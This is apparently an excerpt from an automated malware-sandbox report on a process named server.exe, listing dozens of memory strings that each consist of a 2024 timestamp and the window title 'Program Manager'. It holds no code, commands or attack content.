Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 19:32:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 22:55:40 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 22:59:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 13:07:03 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 16:44:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 13:53:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:23:24 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 18:55:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 13:53:42 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 23:21:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 14:19:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 23:19:03 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 08:08:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/20 | 00:15:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 01:14:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 23:09:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 13:30:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 20:43:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 14:01:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 01:24:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/28 | 00:29:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 10:31:11 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 07:58:14 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 08:46:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 07:20:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 10:21:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 07:00:24 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 07:36:05 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 08:24:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 10:11:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 12:45:52 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 15:56:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 18:13:15 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/07 | 02:49:19 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 07:43:51 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 16:20:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 17:42:45 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 04:09:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 07:01:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 07:36:52 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 20:07:16 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 13:14:47 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 15:09:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 05:43:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 05:37:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 03:57:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 21:24:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 07:07:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 13:48:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 20:55:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 23:11:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 06:00:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 21:24:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:56:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 16:00:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 19:53:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 23:17:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 02:03:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 22:49:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 14:08:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 06:52:25 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 21:38:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 18:58:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 07:15:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 15:06:52 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 15:11:02 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 23:20:06 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 07:06:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:39:00 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 11:57:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 13:06:29 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 21:42:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 10:31:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/28 | 00:06:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 11:57:19 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 05:04:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 23:13:43 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 03:03:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 03:33:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 22:57:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 19:31:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 17:42:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 20:59:29 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 06:03:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 12:18:11 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/07/26 | 19:24:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 19:14:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 03:38:42 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 11:28:20 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 12:22:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 20:45:29 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/07/27 | 08:20:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 03:48:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 03:26:57 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 15:27:30 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 04:08:46 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 11:14:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 10:20:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 04:12:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 10:28:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 05:30:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/17 | 19:11:49 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 18:27:49 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 11:28:17 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 12:48:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 08:41:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 23:49:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 23:27:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/28 | 00:21:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 20:22:43 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 00:27:14 - Program Manager
